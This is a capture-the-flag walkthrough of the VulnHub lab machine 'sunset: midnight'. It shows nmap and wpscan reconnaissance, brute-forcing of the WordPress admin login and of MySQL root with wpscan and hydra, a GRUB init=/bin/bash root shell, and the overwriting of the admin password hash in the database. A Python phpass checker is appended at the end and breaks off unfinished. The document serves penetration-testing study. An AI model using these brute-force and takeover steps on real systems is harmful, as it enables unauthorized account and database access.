Target machine: sunset: midnight

emper   ·   Posted 2020-09-02 19:37:31   ·   Technical article

sunset: midnight walkthrough

Prerequisites

1. Download the target machine

Go to https://www.vulnhub.com/ and download the machine you want to use.

The machine used in this walkthrough is sunset: midnight.

2. Import into VMware

I am using VMware 15. Here we simply

click File -> Open -> select the downloaded file (if it is an archive, remember to extract it first; the source file has the .ova extension).

[screenshot: import]

Then set a custom name and storage location, and wait for the import to finish.

3. Start the virtual machine

Once the import is complete, just power it on.

Next comes the hands-on part.

Walkthrough

Attacking machine: Kali 2020

Target machine: midnight

1. Read the description

We need to know what our goal is,

so it is best to read the machine's description (it is just a little below the download link):

  1. Difficulty: Intermediate
  2. Important!: Before auditing this machine make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected.
  3. It is recommended to run this machine in Virtualbox.
  4. This works better with ViritualBox rather than VMware

Can't read English? No problem, it can be translated; the four points say:

  1. Difficulty: intermediate
  2. Important!: before auditing this machine, make sure the host "sunset-midnight" is added to /etc/hosts, otherwise it may not work as expected.
  3. It is recommended to run this machine in VirtualBox.
  4. It works better with VirtualBox than with VMware.

So all this tells us is to add the host to the hosts file so that it runs properly, and that is it.

Let's officially begin.

 

2. Get the target machine's IP

netdiscover can scan for IP addresses on the network:

```
root@For-Fun:~# netdiscover
```

The scan result:

```
 Currently scanning: 10.9.247.0/8   |   Screen View: Unique Hosts

 879 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 52740
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.83.1    00:50:56:c0:00:08    782   46920  VMware, Inc.
 192.168.83.2    00:50:56:e6:01:14     42    2520  VMware, Inc.
 192.168.83.128  00:0c:29:fb:32:82     45    2700  VMware, Inc.
 192.168.83.254  00:50:56:e7:95:b1     10     600  VMware, Inc.
```

The target machine does not show up.

At this point we need to look at the target machine's network settings.

It is set to bridged mode, so it is not on the same network as us.

[screenshot: network connection settings]

So we switch it to NAT mode

and scan again.

It still cannot be found by the scan,

so let's check whether the target machine obtained an IP at all.

 

Check whether the target machine obtained an IP

1. Press e on the boot (GRUB) screen

to enter the edit screen.

2. Replace

```
ro  ->  rw single init=/bin/bash
```

[screenshot: replace]

Then press Ctrl+X to boot into the command line.

[screenshot: root shell]

3. Check the current NIC's IP

```
ip a
```

[screenshot: ip a]

No IP was obtained.

4. Edit the NIC configuration file

```
vi /etc/network/interfaces
```

[screenshot: view]

The interface name in the file does not match the one we saw when checking the IP, so it must be changed (remember to change every occurrence).

vim editing commands:

  • insert text: i
  • append text at the end: a
  • cursor movement: h, j, k, l (left/down/up/right)
  • delete a character: x
  • delete a line: dd
  • leave insert mode: Esc (Insert or i re-enters it)
  • quit the editor: :q
  • force quit without saving: :q!
  • run a shell command: :sh (use exit to return to vi)
  • save the file: :w
  • save the file and quit: :wq
  • search text: /

[screenshot: change]

5. Restart the networking service

```
/etc/init.d/networking restart
```

[screenshot: restart]

An IP address was obtained!!!

Check it:

```
ip a
```

[screenshot: IP]

OK, obtained successfully (192.168.83.145).

Reboot the machine,

then scan again.

 

Scan for the IP

```
root@For-Fun:~# netdiscover
 Currently scanning: 192.168.208.0/16   |   Screen View: Unique Hosts

 17 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1020
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.83.1    00:50:56:c0:00:08     14     840  VMware,
 192.168.83.2    00:50:56:e6:01:14      1      60  VMware,
 192.168.83.145  00:0c:29:07:a4:e4      1      60  VMware,
 192.168.83.254  00:50:56:e4:b0:56      1      60  VMware,
```

The scan now shows our target machine, so let's get to work.

 

3. nmap port scan

3.1 Scan with -A (everything in one go)

```
root@For-Fun:~# nmap -A 192.168.83.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 22:59 CST
Nmap scan report for 192.168.83.145
Host is up (0.00044s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, InteractiveClient, SupportsCompression, FoundRows, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Speaks41ProtocolNew, ConnectWithDatabase, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: M5_aI(,ETW9V&Wdr07``
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:07:A4:E4 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/15%OT=22%CT=1%CU=40001%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5F37F87D%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.83.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds
```

3.2 Analysis

Looking at the scan result, the target has ports 80 and 3306 open:

```
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, InteractiveClient, SupportsCompression, FoundRows,
```

So we can visit port 80.

 

4. Visit the target host in a browser

```
192.168.83.145
```

It turns out the site cannot be accessed.

[screenshot: failed]

Then we remember the hint from earlier:

```
make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected.
```

So we were already told that the host has to be written into the hosts file first.

4.1 Edit the hosts file

```
root@For-Fun:~# vim /etc/hosts
....
127.0.0.1 localhost
```

We just add the entry:

```
127.0.0.1 localhost
192.168.83.145 sunset-midnight
```

Then Esc, :wq to save and quit,

and try to visit it again.

4.2 Visit the target's port 80

```
192.168.83.145
```

Access succeeds.

Browsing around, we find:

"Proudly powered by WordPress"

 

5. WPScan scan

Use the WordPress scanning tool wpscan to scan the site.

5.1 wpscan options

If this is your first time using it and you do not know the options, look at the help to see what is available:

```
root@For-Fun:~# wpscan --help
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

Usage: wpscan [options]
        --url URL                        The URL of the blog to scan
                                         Allowed Protocols: http, https
                                         Default Protocol if none provided: http
                                         This option is mandatory unless update or help or hh or version is/are supplied
    -h, --help                           Display the simple help and exit
        --hh                             Display the full help and exit
        --version                        Display the version and exit
    -v, --verbose                        Verbose mode
        --[no-]banner                    Whether or not to display the banner
                                         Default: true
    -o, --output FILE                    Output to FILE
    -f, --format FORMAT                  Output results in the format supplied
                                         Available choices: cli-no-colour, cli-no-color, json, cli
        --detection-mode MODE            Default: mixed
                                         Available choices: mixed, passive, aggressive
        --user-agent, --ua VALUE
        --random-user-agent, --rua       Use a random user-agent for each scan
        --http-auth login:password
    -t, --max-threads VALUE              The max threads to use
                                         Default: 5
        --throttle MilliSeconds          Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
        --request-timeout SECONDS        The request timeout in seconds
                                         Default: 60
        --connect-timeout SECONDS        The connection timeout in seconds
                                         Default: 30
        --disable-tls-checks             Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)
        --proxy protocol://IP:port       Supported protocols depend on the cURL installed
        --proxy-auth login:password
        --cookie-string COOKIE           Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
        --cookie-jar FILE-PATH           File to read and write cookies
                                         Default: /tmp/wpscan/cookie_jar.txt
        --force                          Do not check if the target is running WordPress
        --[no-]update                    Whether or not to update the Database
        --api-token TOKEN                The WPVulnDB API Token to display vulnerability data
        --wp-content-dir DIR             The wp-content directory if custom or not detected, such as "wp-content"
        --wp-plugins-dir DIR             The plugins directory if custom or not detected, such as "wp-content/plugins"
    -e, --enumerate [OPTS]               Enumeration Process
                                         Available Choices:
                                          vp   Vulnerable plugins
                                          ap   All plugins
                                          p    Popular plugins
                                          vt   Vulnerable themes
                                          at   All themes
                                          t    Popular themes
                                          tt   Timthumbs
                                          cb   Config backups
                                          dbe  Db exports
                                          u    User IDs range. e.g: u1-5
                                               Range separator to use: '-'
                                               Value if no argument supplied: 1-10
                                          m    Media IDs range. e.g m1-15
                                               Note: Permalink setting must be set to "Plain" for those to be detected
                                               Range separator to use: '-'
                                               Value if no argument supplied: 1-100
                                         Separator to use between the values: ','
                                         Default: All Plugins, Config Backups
                                         Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
                                         Incompatible choices (only one of each group/s can be used):
                                          - vp, ap, p
                                          - vt, at, t
        --exclude-content-based REGEXP_OR_STRING
                                         Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
                                         Both the headers and body are checked. Regexp delimiters are not required.
        --plugins-detection MODE         Use the supplied mode to enumerate Plugins.
                                         Default: passive
                                         Available choices: mixed, passive, aggressive
        --plugins-version-detection MODE Use the supplied mode to check plugins' versions.
                                         Default: mixed
                                         Available choices: mixed, passive, aggressive
    -P, --passwords FILE-PATH            List of passwords to use during the password attack.
                                         If no --username/s option supplied, user enumeration will be run.
    -U, --usernames LIST                 List of usernames to use during the password attack.
                                         Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
        --multicall-max-passwords MAX_PWD
                                         Maximum number of passwords to send by request with XMLRPC multicall
                                         Default: 500
        --password-attack ATTACK         Force the supplied attack to be used rather than automatically determining one.
                                         Available choices: wp-login, xmlrpc, xmlrpc-multicall
        --stealthy                       Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive

[!] To see full list of options use --hh.
```

The simplest thing is to just run a scan.

5.2 Scan the target site with wpscan

The basic scan command:

```
root@For-Fun:~# wpscan --url url
```

Fill in the target's URL and the scan starts.

Scan the target host:

```
root@For-Fun:~# wpscan --url http://sunset-midnight/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://sunset-midnight/ [192.168.83.145]
[+] Started: Sun Aug 16 13:42:58 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://sunset-midnight/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://sunset-midnight/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simply-poll-master
 | Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sun Aug 16 13:43:03 2020
[+] Requests Done: 23
[+] Cached Requests: 36
[+] Data Sent: 5.319 KB
[+] Data Received: 63.057 KB
[+] Memory used: 212.102 MB
[+] Elapsed time: 00:00:04
```

5.3 Information summary

  1. A robots.txt file exists, revealing the admin page

```
[+] http://sunset-midnight/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%
```

  2. There is an uploads directory (with listing enabled)

```
[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
```

That is enough analysis for now; let's go and try things.

 

5.4 Visiting the findings

Visiting each of them, only the admin login page is of any use.

[screenshot: login page]

So we can try brute-forcing the username and password.

1. Brute-force the user

Again with wpscan, this time to enumerate users:

```
root@For-Fun:~# wpscan --url http://sunset-midnight/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://sunset-midnight/ [192.168.83.145]
[+] Started: Sun Aug 16 17:15:56 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://sunset-midnight/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://sunset-midnight/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1
 |  Oembed API - Author URL (Aggressive Detection)
 |   - http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sun Aug 16 17:16:42 2020
[+] Requests Done: 48
[+] Cached Requests: 9
[+] Data Sent: 11.854 KB
[+] Data Received: 596.468 KB
[+] Memory used: 177.289 MB
[+] Elapsed time: 00:00:46
```

The admin user was found:

```
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1
 |  Oembed API - Author URL (Aggressive Detection)
 |   - http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```

So we can try brute-forcing the password.

2. Brute-force the password

Here we need a wordlist, so we use the one that ships with the system:

```
root@For-Fun:~# wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
```

  • -P: password attack
  • /usr/share/wordlists/rockyou.txt: location of the wordlist
  • -U: specify the user
  • admin: the username

Let's leave it running slowly

while we analyze other things.

 

5.5 Port 3306: mysql

Earlier we also found port 3306 open.

That is the MySQL database port,

so we can try to brute-force the MySQL username and password.

The user is usually root,

so let's try brute-forcing its password directly.

1. Brute-force the password with hydra

The password still needs a wordlist, so we keep using the one from before.

  • -l: specify the user (root)
  • -P: specify the password list

```
root@For-Fun:~# hydra 192.168.83.145 mysql -l root -P /usr/share/wordlists/rockyou.txt
```

[screenshot: brute force]

The credentials are found:

```
[3306][mysql] host: 192.168.83.145   login: root   password: robert
```

Now that we know the username and password, we can try logging in to the database.

 

2. Log in to the database

Here we use mysql's remote connection, with -h specifying the target:

  • Target: 192.168.83.145
  • User: root
  • Password: robert

```
root@For-Fun:~# mysql -h 192.168.83.145 -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 954022
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
```

3. Look at the data

First, list the databases:

```
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.072 sec)
```

Oh, there is wordpress_db, which is probably the database we are looking for.

Let's go in and look at the tables:

```
MariaDB [(none)]> use wordpress_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress_db]> show tables;
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta         |
| wp_comments            |
| wp_links               |
| wp_options             |
| wp_postmeta            |
| wp_posts               |
| wp_sp_polls            |
| wp_term_relationships  |
| wp_term_taxonomy       |
| wp_termmeta            |
| wp_terms               |
| wp_usermeta            |
| wp_users               |
+------------------------+
13 rows in set (0.001 sec)
```

We find wp_users, which should hold the user data.

Let's look at it:

```
MariaDB [wordpress_db]> select * from wp_users;
```

[screenshot: data]

The query returns:

  1. User: admin
  2. Password: $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

But by the look of it, the password is stored encrypted (hashed).

So what do we do next?

There are several options:

  1. Try to crack it
    1. Search online for a cracking site (databases usually store a hash, md5)
    2. Use a tool to crack it: john
  2. Overwrite the data directly, replacing it with data we created

Here we will simply overwrite it: quick and crude (this is usually what a hacker does).

 

4. Update the data

First get an MD5 hash (use any online hash site, or just call the function directly):

```
123456 --> E10ADC3949BA59ABBE56E057F20F883E
```

Then we update the data:

  • update: the update operation
  • wp_users: the table we are updating
  • set: the column to update

```
MariaDB [wordpress_db]> update wp_users set user_pass='E10ADC3949BA59ABBE56E057F20F883E' where user_login='admin';
Query OK, 1 row affected (0.002 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```

Then we look at the data again:

```
MariaDB [wordpress_db]> select * from wp_users;
```

[screenshot: data]

It has been updated:

  • user_login: admin
  • user_pass: E10ADC3949BA59ABBE56E057F20F883E

So let's try logging in.

[screenshot: login]

The login says the password is wrong. What is going on?

The hash is not wrong, is it?

It turns out that with MD5 hashing, the letters in the hash string are case-sensitive.

We used the uppercase form before, so let's try lowercase.

 

5. Change the data again

Hash:

```
123456 --> e10adc3949ba59abbe56e057f20f883e
```

Update the data:

```
MariaDB [wordpress_db]> update wp_users set user_pass='e10adc3949ba59abbe56e057f20f883e' where user_login='admin';
Query OK, 1 row affected (0.001 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```

Update complete.

Check it:

```
MariaDB [wordpress_db]> select * from wp_users;
```

[screenshot: data]

We see:

  • user_login: admin
  • user_pass: $P$B7xTzj.plSvhoLVSdmMFD85IJZSdWq1

The stored value has been converted into something like what we saw at first, so it probably worked (by this point the brute-force attack started earlier still has not produced anything).
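Why the uppercase hash failed and why the stored value changed by itself: WordPress's wp_check_password() treats a user_pass of 32 characters or less as a legacy plain MD5 and compares it byte for byte with md5($password), which PHP emits as lowercase hex, so an uppercase string can never match. After a successful legacy match it re-hashes the password with phpass (the portable $P$ scheme, 2^13 rounds of MD5 over a random 8-character salt) and writes that back, which is where the $P$B... value above comes from. The Python below is an added example that re-implements that check; it is not code from the post or from WordPress. The salt and passwords are constructed for the demonstration, and the stored hash from the post can be checked the same way with wp_check_password("123456", "$P$B7xTzj.plSvhoLVSdmMFD85IJZSdWq1").

```python
import hashlib
import hmac

# phpass alphabet, in the same order WordPress's class-phpass.php uses.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant: 3 input bytes -> 4 output chars, little-endian."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Portable phpass hash: $P$ + log2(rounds) char + 8-char salt + 22-char digest.
    'setting' may be a full stored hash; only its first 12 characters are used.
    Returns "*0" (never equal to a real hash) on a malformed setting, as phpass does."""
    if setting[:3] not in ("$P$", "$H$"):
        return "*0"
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return "*0"
    salt = setting[4:12]
    if len(salt) != 8:
        return "*0"
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):          # '$P$B' -> 2^13 = 8192 rounds
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Create a new $P$ hash. WordPress picks '$P$B' (2^13 rounds) and a random salt;
    here the salt is passed in so the result is reproducible."""
    if len(salt) != 8 or not 7 <= count_log2 <= 30:
        raise ValueError("salt must be 8 chars and count_log2 in 7..30")
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def wp_check_password(password: str, stored: str) -> bool:
    """Mirror of WordPress wp_check_password(): a stored value of 32 chars or less is a
    legacy plain MD5 (lowercase hex, compared exactly); anything longer goes through phpass."""
    if len(stored) <= 32:
        return hmac.compare_digest(hashlib.md5(password.encode("utf-8")).hexdigest(), stored)
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


def needs_rehash(stored: str) -> bool:
    """True when WordPress would replace the value on the next successful login (legacy MD5)."""
    return len(stored) <= 32


if __name__ == "__main__":
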